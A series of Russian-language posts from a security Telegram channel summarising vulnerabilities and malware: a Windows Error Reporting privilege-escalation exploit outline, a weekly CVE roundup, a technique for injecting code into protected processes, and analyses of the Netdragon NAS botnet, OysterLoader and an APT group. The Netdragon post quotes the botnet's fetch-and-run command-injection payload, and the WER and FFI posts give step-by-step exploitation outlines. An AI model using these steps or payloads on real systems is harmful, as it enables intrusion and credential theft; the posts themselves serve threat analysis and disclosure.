Похек

Напоминаю, завтра в 20:00 будет AMA эфир

Повышение привилегий с нуля до SYSTEM через WER #LPE #WER #Windows #CVE Эксплуатация CVE-2026-20817 в службе Windows Error Reporting (WER) позволяет локальному атакующему повысить привилегии от низкого уровня до NT AUTHORITY\SYSTEM. ♾️Техническая суть♾️**** Уязвимость связана с отсутствием проверки авторизации в интерфейсе ALPC. Служба WER, работающая от SYSTEM, публикует порт \WindowsErrorReportingService без проверки прав клиента. В функции CWerService::SvcElevatedLaunch отсутствует валидация привилегий вызывающей стороны. Низкопривилегированный пользователь может отправить ALPC-сообщение с дескриптором разделяемой памяти, содержащей произвольную командную строку. После этого служба: ▪️ дублирует переданную память, ▪️ читает командную строку без дополнительной валидации, ▪️ при невозможности получить токен клиента выполняет fallback, ▪️ создает ограниченный SYSTEM-токен через CreateRestrictedToken, удаляя только SeTcbPrivilege, но сохраняя критичные привилегии: SeDebugPrivilege, SeImpersonatePrivilege и SeBackupPrivilege. В результате запускается процесс WerFault.exe или WerMgr.exe с SYSTEM-привилегиями и контролируемой командной строкой. ♾️Импакт♾️ Полная компрометация системы — выполнение кода с правами SYSTEM (локальная LPE). ♾️Эксплуатация♾️ ▪️ Создать разделяемую память (CreateFileMapping, MapViewOfFile) и записать произвольную командную строку (например, cmd.exe /c whoami > C:\poc_wer.txt). ▪️ Подключиться к ALPC-порту \WindowsErrorReportingService через NtAlpcConnectPort / NtAlpcSendWaitReceivePort. ▪️ Отправить специально сформированное ALPC-сообщение: тип 0, метод 0x0D (WER_ELEVATED_LAUNCH_METHOD), дескриптор разделяемой памяти, длина строки, PID клиента. ▪️ После WER вызывает цепочку: SvcElevatedLaunch → ElevatedProcessStart → CreateElevatedProcessAsUser. ▪️ Fallback-логика создает ограниченный SYSTEM-токен и запускает CreateProcessAsUserW с WerFault.exe и контролируемой строкой. 🔗Источник и PoC 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Ловите вкусные баги прошедшей недели #Calibre #Google #Ghost #GetSimple #ApacheVelocity #CVE ▪️ Calibre (CVE-2026-26065, CVSS 9.3) — path traversal в PDB-ридерах Calibre, вызванная некорректной обработкой путей при извлечении содержимого PDB-файлов. Специально сформированный файл позволяет записывать произвольные файлы в директории, доступные пользователю, включая перезапись существующих без подтверждения. Импакт зависит от прав процесса Calibre и может привести к повреждению данных, DoS и, в отдельных сценариях, к RCE. ▪️ Google Cloud Vertex AI SDK for Python (CVE-2026-2472, CVSS 8.6) — stored XSS в компоненте визуализации GenAI/оценок моделей пакета google-cloud-aiplatform. Вредоносный JavaScript может быть внедрен в результаты модели или JSON-датасеты и выполнен в браузере пользователя при отображении в Jupyter/Colab. Позволяет выполнить произвольный JS в контексте сессии, что потенциально ведет к краже токенов, перехвату сессии или несанкционированным действиям от имени пользователя. ▪️ Ghost (CVE-2026-26980, CVSS 9.4) — SQLi в headless CMS Ghost, расположенная в публичном Content API. Из-за недостаточной валидации/экранирования параметра фильтрации slug в query string неаутентифицированный удаленный атакующий может осуществлять произвольное чтение данных из базы (arbitrary read) без каких-либо привилегий или взаимодействия с пользователем. Эксплойт ▪️GetSimple CMS (CVE-2026-27161**, CVSS 8.7) **— защита чувствительных директорий (/data/, /backups/ и др.) реализована исключительно через правила .htaccess. При отключенном или ограниченном AllowOverride в конфигурации Apache защита не применяется, что позволяет удаленному неаутентифицированному атакующему получить прямой доступ к файлам, включая authorization.xml с ключами и другими секретами. Эксплойт ▪️ WSO2 Identity Server (CVE-2025-12107, CVSS 7.2) — template injection в компоненте, использующем Velocity template engine (Apache Velocity). Атакующий с административными привилегиями может внедрять и исполнять произвольный шаблонный код. При небезопасной конфигурации это может привести к выполнению кода на сервере и компрометации системы. 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

С Днём защитника Отечества! От всего сердца хочу выразить глубокое уважение всем, кто сегодня стоит на страже нашей Родины. Низкий поклон героям, которые защищают страну на передовой, рискуя собой каждую минуту. Ваше мужество — это настоящий щит России. Также я хочу искренне поблагодарить тех, кто держит оборону на невидимом фронте. Ваша круглосуточная защита информационных рубежей и отражение кибератак — это важнейший вклад в нашу общую безопасность. Желаю вам крепкого здоровья, несгибаемой воли, надежного тыла и сил для выполнения всех поставленных задач. Берегите себя! Горжусь каждым из вас. С праздником! Мы гордимся вами!

[Вложение без текста]

Обход модели неизменяемости образов в Windows через FFI #FFI #Windows #kernel Elastic Security Labs описала технику эксплуатации уязвимостей класса False File Immutability (FFI), позволяющую локально модифицировать исполняемые образы и DLL, загруженные в память защищенных процессов. В результате получаем исполнение кода в контексте PPL (Protected Process Light) с последующей возможностю дампа LSASS и обхода Defender/EDR без дополнительных инструментов. ♾️Техническая суть♾️**** Проблема связана с нарушением предположения ядра Windows о неизменяемости файлов, отображенных как SEC_IMAGE. Когда процесс загружает placeholder-файл с reparse-тегом IO_REPARSE_TAG_CLOUD, драйвер cldflt.sys перехватывает операции ввода-вывода и инициирует user-mode callback облачного провайдера. В callback провайдер через CfExecute передает содержимое файла. cldflt.sys записывает данные через FltWriteFileEx с флагами paging I/O (FLTFL_IO_OPERATION_PAGING | FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING) и использованием IO_IGNORE_SHARE_ACCESS_CHECK. Это позволяет обойти стандартные проверки совместного доступа и ограничения MmFlushImageSection, которые обычно предотвращают запись в исполняемый образ при активном отображении. В результате файл может быть перезаписан даже при отсутствии обычных прав на FILE_WRITE_DATA, если операция инициирована через механизм rehydration. ♾️Реализация♾️ ▪️ Создается dehydrated placeholder-файл через API Cloud Files (cldapi.dll: CfCreatePlaceholder, CfSetPinState и др.). ▪️ Целевой процесс (например, services.exe с уровнем защиты PPL WinTcb-Light) загружает файл как DLL или исполняемый образ. ▪️ В первом callback провайдер вызывает CfExecute и возвращает оригинальный подписанный файл — Code Integrity успешно проверяет подпись. ▪️ Далее из другого потока вызываются CfDehydratePlaceholder и CfHydratePlaceholder, что инициирует повторный callback и поставку содержимого. ▪️ Во втором callback CfExecute возвращает вредоносный пейлоад, после чего cldflt.sys записывает его через paging I/O, фактически перезаписывая отображенный образ в обход стандартных share/access-ограничений. ▪️ Модифицированная DLL загружается в защищенный процесс, что приводит к выполнению произвольного кода в PPL-контексте. 🔗Источник 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Netdragon: ботнет для NAS с kernel-руткитом и ChaCha20 C2 #botnet #rootkit #malware #NAS Разобрал Netdragon - кампанию, нацеленную на NAS-устройства Feiniu (fnOS). Около 1500 заражённых устройств, больше 1100 одновременно онлайн. Почти все - в Азии, торчат в интернет через публичный IP. Как попадают внутрь Unauthenticated command injection в CGI веб-интерфейса fnOS <= 3.4.x. Параметр летит прямо в system() без фильтрации. CVE нет. Payload банальный: ;wget http://.../netd;chmod +x netd;./netd Что ставят ➡️ ELF-бэкдор в /tmp/.netdragon/ с HTTP-сервером на портах 57132/57199 ➡️ Команды через GET /api?log=<hex-ChaCha20-ciphertext> ➡️ Поддерживает: exec, upload, download, update, kill ➡️ С февраля 2026 - DDoS-модуль (UDP flood), процесс маскируется под [kworker/0:1] Kernel-руткит: async_memcpys.ko Не ftrace, не kprobe - прямое патчирование sys_call_table и seq_operations. Скрывает: ▪️PID процесса бэкдора ▪️Порты 57132/57199 из /proc/net/tcp ▪️Файлы в /tmp/.netdragon/ Бонус: перехватывает sys_kill - сигнал 64 используется как управляющий канал. Anti-cleanup на серьёзном уровне Watchdog восстанавливает удалённые файлы из бэкапа. Перезаписывает authorized_keys, чтобы IR-команда не могла подключиться по SSH. Блокирует автообновление fnOS - подменяет URL сервера обновлений и следит, чтобы его не вернули. Баг в протоколе Первый login-пакет формируется до инициализации session key - шифруется нулевым ключом. Стабильная сигнатура, по которой можно детектить C2-трафик на IDS. IoC и правила детекта В статье: SHA256, C2 IP, YARA, Suricata и Sigma правила. Полный разбор с C2 handshake, MITRE ATT&CK маппингом и порядком response ТЫК 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Липкий след: исследуем атаки группировки PseudoSticky #ВПО #malware #reverse #incident #analysis В ноябре 2025 года специалисты F6 обнаружили вредоносную кампанию, в которой атакующие использовали LLM при проведении атаки с ВПО PureCrypter и DarkTrack RAT. Дальнейшее исследование активности группировки показало: речь идёт не просто о нескольких атаках, выполняемых с использованием LLM, а о полноценной группировке, проводящей вредоносные кампании и связывающей себя со Sticky Werewolf как посредством TTPs и используемых инструментов, так и прямым их упоминанием. Sticky Werewolf (известна также под псевдонимами MimiStick, Angry Likho, PhaseShifters) – одна из наиболее активных проукраинских АРТ-группировок. Действует с апреля 2023 года, атакует предприятия в России и Беларуси. Одна из особенностей Sticky Werewolf – рассылки писем с вредоносным ПО от имени госведомств, например, Минпромторга, Минобрнауки России, Росгвардии. Цели группировки – предприятия в сфере энергетики, промышленности, ОПК, строительства, ЖКХ, транспорта. Злоумышленники из группировки, применившей LLM в ноябрьской атаке, используют похожие TTPs и виды вредоносного ПО, которые внешне напоминают инструменты, связанные со Sticky Werewolf. В одном из случаев киберпреступники даже использовали название этой группировки в качестве пароля для вредоносного архива. Однако при более внимательном анализе становятся заметны отличия в инфраструктуре, реализации вредоносного кода и отдельных элементах тактики, что позволило нам предположить – вероятно, между группировками нет прямой связи, а есть сознательная мимикрия. По этой причине новую группировку назвали PseudoSticky. 🔗Читать дальше 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Обзор типичного ФИШИНГОВОГО сайта Видео создано в образовательных целях. Разбираем внутренности интересного экземпляра фишингового движка, который работает без сервера на чистых Google Sheets и Telegram. https://www.youtube.com/watch?v=poMR8IAIlHE Попался интересный видос где подробно разбирают фишинговый сайт. Вспомнился случай когда в чате обсуждали скам сайт, который мне скидывали из схемы "антикино" и некоторые люди сделали схожий анализ сайта 🙂 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

OysterLoader: загрузчик Rhysida с RC4-стеганографией в ICO и динамическим C2 #malware #rhysida #loader #c2 OysterLoader (Broomstick / CleanUp) - многоступенчатый C++ загрузчик из экосистемы Vanilla Tempest (ex-Vice Society / WIZARD SPIDER). Таскает Rhysida ransomware и Vidar. Проект живой - C2-протокол и обфускация меняются от версии к версии. Вектор - не фишинг, а malvertising Закупают Bing Ads для поддельных страниц PuTTY, WinSCP, MS Teams. Жертва сама ищет софт, кликает рекламу, получает подписанный MSI. В 2025 задействовано 40+ валидных сертификатов (Microsoft Trusted Signing, DigiCert, GlobalSign). Microsoft отозвала 200+. 4 стадии заражения MSI -> TextShell -> Shellcode + LZMA -> Downloader -> Core DLL ➡️ Stage 1 (TextShell): API hammering сотнями бессмысленных WinAPI-вызовов, dynamic API resolve через хеширование, IsDebuggerPresent() -> бесконечный цикл при отладке. ➡️ Stage 2: Кастомная LZMA без стандартных сигнатур, ручные релокации E8/E9. ➡️ Stage 3 (Downloader): < 60 процессов -> выход. Timing через Beep/Sleep цикл (14 итераций - ловит ускорение sandbox). C2-запрос с User-Agent WordPressAgent и хедером x-amz-cf-id. ➡️ Stage 4 (Core): In-memory PE loader. На диск ничего. Стеганография в ICO C2 отдаёт валидный ICO. После маркера endico (65 6E 64 69 63 6F) - RC4-blob с payload. Ключ зашит в бинарнике. После расшифровки - PE. C2 v2: динамический Base64 Endpoint /api/v2/facade возвращает "tk" - новый Base64-алфавит. Mersenne Twister + случайный shift, каждое сообщение кодируется уникально. Fingerprint хоста (ОС, AV/EDR, ПО, процессы, привилегии) решает, что прилетит жертве: Vidar или Rhysida. Gootloader connection Huntress нашла идентичный TextShell в образцах Gootloader и OysterLoader. Схема: Storm-0494 (initial access через Gootloader) -> Vanilla Tempest (ransomware). Инфраструктура двухуровневая: delivery-tier отдельно от C2. Заблокируешь дроппер-домен - управляющие серверы не вскроешь. 🔗 Полный разбор 🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK